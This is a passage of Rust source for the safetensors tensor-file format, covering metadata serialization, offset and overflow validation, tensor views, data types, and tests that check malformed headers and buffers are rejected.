-> Result where D: Deserializer<'de>, { let hashdata: HashMetadata = HashMetadata::deserialize(deserializer)?; let (metadata, tensors) = (hashdata.metadata, hashdata.tensors); let mut tensors: Vec<_> = tensors.into_iter().collect(); // We need to sort by offsets // Previous versions might have a different ordering // Than we expect (Not aligned ordered, but purely name ordered, // or actually any order). tensors.sort_by(|(_, left), (_, right)| left.data_offsets.cmp(&right.data_offsets)); Metadata::new(metadata, tensors).map_err(serde::de::Error::custom) } } impl Serialize for Metadata { fn serialize(&self, serializer: S) -> Result where S: Serializer, { let mut names = vec![""; self.index_map.len()]; for (name, index) in &self.index_map { names[*index] = name; } let tensors: Vec<_> = names.iter().zip(self.tensors.iter()).collect(); let length = if let Some(metadata) = &self.metadata { metadata.len() } else { 0 }; let mut map = serializer.serialize_map(Some(tensors.len() + length))?; if let Some(metadata) = &self.metadata { map.serialize_entry("__metadata__", metadata)?; } for (name, info) in tensors { map.serialize_entry(&name, &info)?; } map.end() } } impl Metadata { fn new( metadata: Option>, tensors: Vec<(String, TensorInfo)>, ) -> Result { let mut index_map = HashMap::with_capacity(tensors.len()); let tensors: Vec<_> = tensors .into_iter() .enumerate() .map(|(index, (k, tensor))| { index_map.insert(k, index); tensor }) .collect(); let metadata = Self { metadata, tensors, index_map, }; // metadata.validate()?; Ok(metadata) } fn validate(&self) -> Result { let mut start = 0; for (i, info) in self.tensors.iter().enumerate() { let (s, e) = info.data_offsets; if s != start || e < s { let tensor_name = self .index_map .iter() .find_map(|(name, &index)| if index == i { Some(&name[..]) } else { None }) .unwrap_or("no_tensor"); return Err(SafeTensorError::InvalidOffset(tensor_name.to_string())); } start = e; let nelements: usize = info .shape .iter() .cloned() .try_fold(1usize, usize::checked_mul) .ok_or(SafeTensorError::ValidationOverflow)?; let nbytes = nelements .checked_mul(info.dtype.size()) .ok_or(SafeTensorError::ValidationOverflow)?; if (e - s) != nbytes { return Err(SafeTensorError::TensorInvalidInfo); } } Ok(start) } /// Gives back the tensor metadata pub fn info(&self, name: &str) -> Option<&TensorInfo> { let index = self.index_map.get(name)?; self.tensors.get(*index) } /// Gives back the tensor metadata pub fn tensors(&self) -> HashMap { self.index_map .iter() .map(|(tensor_name, index)| (tensor_name.clone(), &self.tensors[*index])) .collect() } /// Gives back the tensor metadata pub fn metadata(&self) -> &Option> { &self.metadata } } /// A view of a Tensor within the file. /// Contains references to data within the full byte-buffer /// And is thus a readable view of a single tensor #[derive(Debug, PartialEq, Eq, Clone)] pub struct TensorView<'data> { dtype: Dtype, shape: Vec, data: &'data [u8], } impl View for &TensorView<'_> { fn dtype(&self) -> Dtype { self.dtype } fn shape(&self) -> &[usize] { &self.shape } fn data(&self) -> Cow<[u8]> { self.data.into() } fn data_len(&self) -> usize { self.data.len() } } impl View for TensorView<'_> { fn dtype(&self) -> Dtype { self.dtype } fn shape(&self) -> &[usize] { &self.shape } fn data(&self) -> Cow<[u8]> { self.data.into() } fn data_len(&self) -> usize { self.data.len() } } impl<'data> TensorView<'data> { /// Create new tensor view pub fn new( dtype: Dtype, shape: Vec, data: &'data [u8], ) -> Result { let n = data.len(); let n_elements: usize = shape.iter().product(); if n != n_elements * dtype.size() { Err(SafeTensorError::InvalidTensorView(dtype, shape, n)) } else { Ok(Self { dtype, shape, data }) } } /// The current tensor dtype pub fn dtype(&self) -> Dtype { self.dtype } /// The current tensor shape pub fn shape(&'data self) -> &'data [usize] { &self.shape } /// The current tensor byte-buffer pub fn data(&self) -> &'data [u8] { self.data } /// The various pieces of the data buffer according to the asked slice pub fn sliced_data( &'data self, slices: &[TensorIndexer], ) -> Result, InvalidSlice> { SliceIterator::new(self, slices) } } /// A single tensor information. /// Endianness is assumed to be little endian /// Ordering is assumed to be 'C'. #[derive(Debug, Deserialize, Serialize, Clone)] pub struct TensorInfo { /// The type of each element of the tensor pub dtype: Dtype, /// The shape of the tensor pub shape: Vec, /// The offsets to find the data within the byte-buffer array. pub data_offsets: (usize, usize), } /// The various available dtypes. They MUST be in increasing alignment order #[derive(Debug, Deserialize, Serialize, Clone, Copy, PartialEq, Eq, Ord, PartialOrd)] #[non_exhaustive] pub enum Dtype { /// Boolan type BOOL, /// Unsigned byte U8, /// Signed byte I8, /// FP8 _ #[allow(non_camel_case_types)] F8_E5M2, /// FP8 _ #[allow(non_camel_case_types)] F8_E4M3, /// Signed integer (16-bit) I16, /// Unsigned integer (16-bit) U16, /// Half-precision floating point F16, /// Brain floating point BF16, /// Signed integer (32-bit) I32, /// Unsigned integer (32-bit) U32, /// Floating point (32-bit) F32, /// Floating point (64-bit) F64, /// Signed integer (64-bit) I64, /// Unsigned integer (64-bit) U64, } impl Dtype { /// Gives out the size (in bytes) of 1 element of this dtype. pub fn size(&self) -> usize { match self { Dtype::BOOL => 1, Dtype::U8 => 1, Dtype::I8 => 1, Dtype::F8_E5M2 => 1, Dtype::F8_E4M3 => 1, Dtype::I16 => 2, Dtype::U16 => 2, Dtype::I32 => 4, Dtype::U32 => 4, Dtype::I64 => 8, Dtype::U64 => 8, Dtype::F16 => 2, Dtype::BF16 => 2, Dtype::F32 => 4, Dtype::F64 => 8, } } } #[cfg(test)] mod tests { use super::*; use crate::slice::IndexOp; use proptest::prelude::*; #[cfg(not(feature = "std"))] extern crate std; use std::io::Write; const MAX_DIMENSION: usize = 8; const MAX_SIZE: usize = 8; const MAX_TENSORS: usize = 8; fn arbitrary_dtype() -> impl Strategy { prop_oneof![ Just(Dtype::BOOL), Just(Dtype::U8), Just(Dtype::I8), Just(Dtype::I16), Just(Dtype::U16), Just(Dtype::I32), Just(Dtype::U32), Just(Dtype::I64), Just(Dtype::U64), Just(Dtype::F16), Just(Dtype::BF16), Just(Dtype::F32), Just(Dtype::F64), ] } fn arbitrary_shape() -> impl Strategy> { // We do not allow empty shapes or 0 sizes. (1..MAX_DIMENSION).prop_flat_map(|length| prop::collection::vec(1..MAX_SIZE, length)) } fn arbitrary_metadata() -> impl Strategy { // We generate at least one tensor. (1..MAX_TENSORS) .prop_flat_map(|size| { // Returns a strategy generating `size` data types and shapes. ( prop::collection::vec(arbitrary_dtype(), size), prop::collection::vec(arbitrary_shape(), size), ) }) .prop_map(|(dtypes, shapes)| { // Returns a valid metadata object for a random (length, dtypes, shapes) triple. let mut start = 0; let tensors: Vec = dtypes .iter() .zip(shapes) .map(|(dtype, shape)| { // This cannot overflow because the size of // the vector and elements are so small. let length: usize = shape.iter().product(); let end = start + length * dtype.size(); let tensor = TensorInfo { dtype: *dtype, shape, data_offsets: (start, end), }; start = end; tensor }) .collect(); let index_map = (0..tensors.len()) .map(|index| (format!("t.{index}"), index)) .collect(); Metadata { metadata: None, tensors, index_map, } }) } /// This method returns the size of the data corresponding to the metadata. It /// assumes that `metadata` contains at least one tensor, and that tensors are /// ordered by offset in `metadata.tensors`. /// /// # Panics /// /// This method will panic if `metadata` does not contain any tensors. fn data_size(metadata: &Metadata) -> usize { metadata.tensors.last().unwrap().data_offsets.1 } proptest! { #![proptest_config(ProptestConfig::with_cases(20))] #[test] fn test_indexing(metadata in arbitrary_metadata()) { let data = vec![0u8; data_size(&metadata)]; let tensors = SafeTensors { metadata, data: &data }; for name in tensors.names() { assert!(tensors.tensor(name).is_ok()); } } #[test] fn test_roundtrip(metadata in arbitrary_metadata()) { let data: Vec = (0..data_size(&metadata)).map(|x| x as u8).collect(); let before = SafeTensors { metadata, data: &data }; let tensors = before.tensors(); let bytes = serialize(tensors.iter().map(|(name, view)| (name.to_string(), view)), &None).unwrap(); let after = SafeTensors::deserialize(&bytes).unwrap(); // Check that the tensors are the same after deserialization. assert_eq!(before.names().len(), after.names().len()); for name in before.names() { let tensor_before = before.tensor(name).unwrap(); let tensor_after = after.tensor(name).unwrap(); assert_eq!(tensor_after.data().as_ptr() as usize % tensor_after.dtype().size(), 0); assert_eq!(tensor_before, tensor_after); } } } #[test] fn test_serialization() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let shape = vec![1, 2, 3]; let attn_0 = TensorView::new(Dtype::F32, shape, &data).unwrap(); let metadata: HashMap = [("attn.0".to_string(), attn_0)].into_iter().collect(); let out = serialize(&metadata, &None).unwrap(); assert_eq!( out, [ 64, 0, 0, 0, 0, 0, 0, 0, 123, 34, 97, 116, 116, 110, 46, 48, 34, 58, 123, 34, 100, 116, 121, 112, 101, 34, 58, 34, 70, 51, 50, 34, 44, 34, 115, 104, 97, 112, 101, 34, 58, 91, 49, 44, 50, 44, 51, 93, 44, 34, 100, 97, 116, 97, 95, 111, 102, 102, 115, 101, 116, 115, 34, 58, 91, 48, 44, 50, 52, 93, 125, 125, 0, 0, 0, 0, 0, 0, 128, 63, 0, 0, 0, 64, 0, 0, 64, 64, 0, 0, 128, 64, 0, 0, 160, 64 ] ); let _parsed = SafeTensors::deserialize(&out).unwrap(); } #[test] fn test_empty() { let tensors: HashMap = HashMap::new(); let out = serialize(&tensors, &None).unwrap(); assert_eq!( out, [8, 0, 0, 0, 0, 0, 0, 0, 123, 125, 32, 32, 32, 32, 32, 32] ); let _parsed = SafeTensors::deserialize(&out).unwrap(); let metadata: Option> = Some( [("framework".to_string(), "pt".to_string())] .into_iter() .collect(), ); let out = serialize(&tensors, &metadata).unwrap(); assert_eq!( out, [ 40, 0, 0, 0, 0, 0, 0, 0, 123, 34, 95, 95, 109, 101, 116, 97, 100, 97, 116, 97, 95, 95, 34, 58, 123, 34, 102, 114, 97, 109, 101, 119, 111, 114, 107, 34, 58, 34, 112, 116, 34, 125, 125, 32, 32, 32, 32, 32 ] ); let _parsed = SafeTensors::deserialize(&out).unwrap(); } #[test] fn test_serialization_forced_alignement() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let shape = vec![1, 1, 2, 3]; let attn_0 = TensorView::new(Dtype::F32, shape, &data).unwrap(); let metadata: HashMap = // Smaller string to force misalignment compared to previous test. [("attn0".to_string(), attn_0)].into_iter().collect(); let out = serialize(&metadata, &None).unwrap(); assert_eq!( out, [ 72, 0, 0, 0, 0, 0, 0, 0, 123, 34, 97, 116, 116, 110, 48, 34, 58, 123, 34, 100, 116, 121, 112, 101, 34, 58, 34, 70, 51, 50, 34, 44, 34, 115, 104, 97, 112, 101, 34, 58, 91, 49, 44, 49, 44, 50, 44, 51, 93, 44, 34, 100, 97, 116, 97, 95, 111, 102, 102, // All the 32 are forcing alignement of the tensor data for casting to f32, f64 // etc.. 115, 101, 116, 115, 34, 58, 91, 48, 44, 50, 52, 93, 125, 125, 32, 32, 32, 32, 32, 32, 32, 0, 0, 0, 0, 0, 0, 128, 63, 0, 0, 0, 64, 0, 0, 64, 64, 0, 0, 128, 64, 0, 0, 160, 64 ], ); let parsed = SafeTensors::deserialize(&out).unwrap(); let tensor = parsed.tensor("attn0").unwrap(); assert_eq!(tensor.data().as_ptr() as usize % tensor.dtype().size(), 0); } #[test] fn test_slicing() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView { dtype: Dtype::F32, shape: vec![1, 2, 3], data: &data, }; let metadata: HashMap = [("attn.0".to_string(), attn_0)].into_iter().collect(); let out = serialize(&metadata, &None).unwrap(); let parsed = SafeTensors::deserialize(&out).unwrap(); let out_buffer: Vec = parsed .tensor("attn.0") .unwrap() .slice((.., ..1)) .unwrap() .flat_map(|b| b.to_vec()) .collect(); assert_eq!(out_buffer, vec![0u8, 0, 0, 0, 0, 0, 128, 63, 0, 0, 0, 64]); assert_eq!( out_buffer, vec![0.0f32, 1.0, 2.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect::>() ); let out_buffer: Vec = parsed .tensor("attn.0") .unwrap() .slice((.., .., ..1)) .unwrap() .flat_map(|b| b.to_vec()) .collect(); assert_eq!(out_buffer, vec![0u8, 0, 0, 0, 0, 0, 64, 64]); assert_eq!( out_buffer, vec![0.0f32, 3.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect::>() ); } #[test] fn test_gpt2() { gpt2_like(12, "gpt2"); } #[test] fn test_gpt2_tiny() { gpt2_like(6, "gpt2_tiny"); } fn gpt2_like(n_heads: usize, model_id: &str) { let mut tensors_desc = vec![]; tensors_desc.push(("wte".to_string(), vec![50257, 768])); tensors_desc.push(("wpe".to_string(), vec![1024, 768])); for i in 0..n_heads { tensors_desc.push((format!("h.{i}.ln_1.weight"), vec![768])); tensors_desc.push((format!("h.{i}.ln_1.bias"), vec![768])); tensors_desc.push((format!("h.{i}.attn.bias"), vec![1, 1, 1024, 1024])); tensors_desc.push((format!("h.{i}.attn.c_attn.weight"), vec![768, 2304])); tensors_desc.push((format!("h.{i}.attn.c_attn.bias"), vec![2304])); tensors_desc.push((format!("h.{i}.attn.c_proj.weight"), vec![768, 768])); tensors_desc.push((format!("h.{i}.attn.c_proj.bias"), vec![768])); tensors_desc.push((format!("h.{i}.ln_2.weight"), vec![768])); tensors_desc.push((format!("h.{i}.ln_2.bias"), vec![768])); tensors_desc.push((format!("h.{i}.mlp.c_fc.weight"), vec![768, 3072])); tensors_desc.push((format!("h.{i}.mlp.c_fc.bias"), vec![3072])); tensors_desc.push((format!("h.{i}.mlp.c_proj.weight"), vec![3072, 768])); tensors_desc.push((format!("h.{i}.mlp.c_proj.bias"), vec![768])); } tensors_desc.push(("ln_f.weight".to_string(), vec![768])); tensors_desc.push(("ln_f.bias".to_string(), vec![768])); let dtype = Dtype::F32; let n: usize = tensors_desc .iter() .map(|(_, shape)| shape.iter().product::()) .sum::() * dtype.size(); // 4 let all_data = vec![0; n]; let mut metadata = HashMap::with_capacity(tensors_desc.len()); let mut offset = 0; for (name, shape) in tensors_desc { let n: usize = shape.iter().product(); let buffer = &all_data[offset..offset + n * dtype.size()]; let tensor = TensorView::new(dtype, shape, buffer).unwrap(); metadata.insert(name, tensor); offset += n; } let filename = format!("./out_{model_id}.safetensors"); let out = serialize(&metadata, &None).unwrap(); std::fs::write(&filename, out).unwrap(); let raw = std::fs::read(&filename).unwrap(); let _deserialized = SafeTensors::deserialize(&raw).unwrap(); std::fs::remove_file(&filename).unwrap(); // File api #[cfg(feature = "std")] { serialize_to_file(&metadata, &None, std::path::Path::new(&filename)).unwrap(); let raw = std::fs::read(&filename).unwrap(); let _deserialized = SafeTensors::deserialize(&raw).unwrap(); std::fs::remove_file(&filename).unwrap(); } } #[test] fn test_empty_shapes_allowed() { let serialized = b"8\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[],\"data_offsets\":[0,4]}}\x00\x00\x00\x00"; let loaded = SafeTensors::deserialize(serialized).unwrap(); assert_eq!(loaded.names(), vec!["test"]); let tensor = loaded.tensor("test").unwrap(); assert!(tensor.shape().is_empty()); assert_eq!(tensor.dtype(), Dtype::I32); // 4 bytes assert_eq!(tensor.data(), b"\0\0\0\0"); } #[test] fn test_deserialization() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; let loaded = SafeTensors::deserialize(serialized).unwrap(); assert_eq!(loaded.len(), 1); assert_eq!(loaded.names(), vec!["test"]); let tensor = loaded.tensor("test").unwrap(); assert_eq!(tensor.shape(), vec![2, 2]); assert_eq!(tensor.dtype(), Dtype::I32); // 16 bytes assert_eq!(tensor.data(), b"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"); } #[test] fn test_lifetimes() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; let tensor = { let loaded = SafeTensors::deserialize(serialized).unwrap(); loaded.tensor("test").unwrap() }; assert_eq!(tensor.shape(), vec![2, 2]); assert_eq!(tensor.dtype(), Dtype::I32); // 16 bytes assert_eq!(tensor.data(), b"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"); } #[test] fn test_json_attack() { let mut tensors = HashMap::new(); let dtype = Dtype::F32; let shape = vec![2, 2]; let data_offsets = (0, 16); for i in 0..10 { tensors.insert( format!("weight_{i}"), TensorInfo { dtype, shape: shape.clone(), data_offsets, }, ); } let metadata = HashMetadata { metadata: None, tensors, }; let serialized = serde_json::to_string(&metadata).unwrap(); let serialized = serialized.as_bytes(); let n = serialized.len(); let filename = "out.safetensors"; let mut f = std::io::BufWriter::new(std::fs::File::create(filename).unwrap()); f.write_all(n.to_le_bytes().as_ref()).unwrap(); f.write_all(serialized).unwrap(); f.write_all(b"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0").unwrap(); f.flush().unwrap(); let reloaded = std::fs::read(filename).unwrap(); match SafeTensors::deserialize(&reloaded) { Err(SafeTensorError::InvalidOffset(_)) => { // Yes we have the correct error, name of the tensor is random though } Err(err) => panic!("Unexpected error {err:?}"), Ok(_) => panic!("This should not be able to be deserialized"), } } #[test] fn test_metadata_incomplete_buffer() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00extra_bogus_data_for_polyglot_file"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::MetadataIncompleteBuffer) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } // Missing data in the buffer let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; // <--- missing 2 bytes match SafeTensors::deserialize(serialized) { Err(SafeTensorError::MetadataIncompleteBuffer) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_header_too_large() { let serialized = b"<\x00\x00\x00\x00\xff\xff\xff{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::HeaderTooLarge) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_header_too_small() { let serialized = b""; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::HeaderTooSmall) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_invalid_header_length() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::InvalidHeaderLength) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_invalid_header_non_utf8() { let serialized = b"\x01\x00\x00\x00\x00\x00\x00\x00\xff"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::InvalidHeader) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_invalid_header_not_json() { let serialized = b"\x01\x00\x00\x00\x00\x00\x00\x00{"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::InvalidHeaderDeserialization) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] /// Test that the JSON header may be trailing-padded with JSON whitespace characters. fn test_whitespace_padded_header() { let serialized = b"\x06\x00\x00\x00\x00\x00\x00\x00{}\x0D\x20\x09\x0A"; let loaded = SafeTensors::deserialize(serialized).unwrap(); assert_eq!(loaded.len(), 0); } // Reserver for 0.4.0 // #[test] // /// Test that the JSON header must begin with a `{` character. // fn test_whitespace_start_padded_header_is_not_allowed() { // let serialized = b"\x06\x00\x00\x00\x00\x00\x00\x00\x09\x0A{}\x0D\x20"; // match SafeTensors::deserialize(serialized) { // Err(SafeTensorError::InvalidHeaderStart) => { // // Correct error // } // _ => panic!("This should not be able to be deserialized"), // } // } #[test] fn test_zero_sized_tensor() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,0],\"data_offsets\":[0, 0]}}"; let loaded = SafeTensors::deserialize(serialized).unwrap(); assert_eq!(loaded.names(), vec!["test"]); let tensor = loaded.tensor("test").unwrap(); assert_eq!(tensor.shape(), vec![2, 0]); assert_eq!(tensor.dtype(), Dtype::I32); assert_eq!(tensor.data(), b""); } #[test] fn test_invalid_info() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0, 4]}}"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::TensorInvalidInfo) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_validation_overflow() { // u64::MAX = 18_446_744_073_709_551_615u64 // Overflow the shape calculation. let serialized = b"O\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,18446744073709551614],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::ValidationOverflow) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } // u64::MAX = 18_446_744_073_709_551_615u64 // Overflow the num_elements * total shape. let serialized = b"N\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,9223372036854775807],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::ValidationOverflow) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } }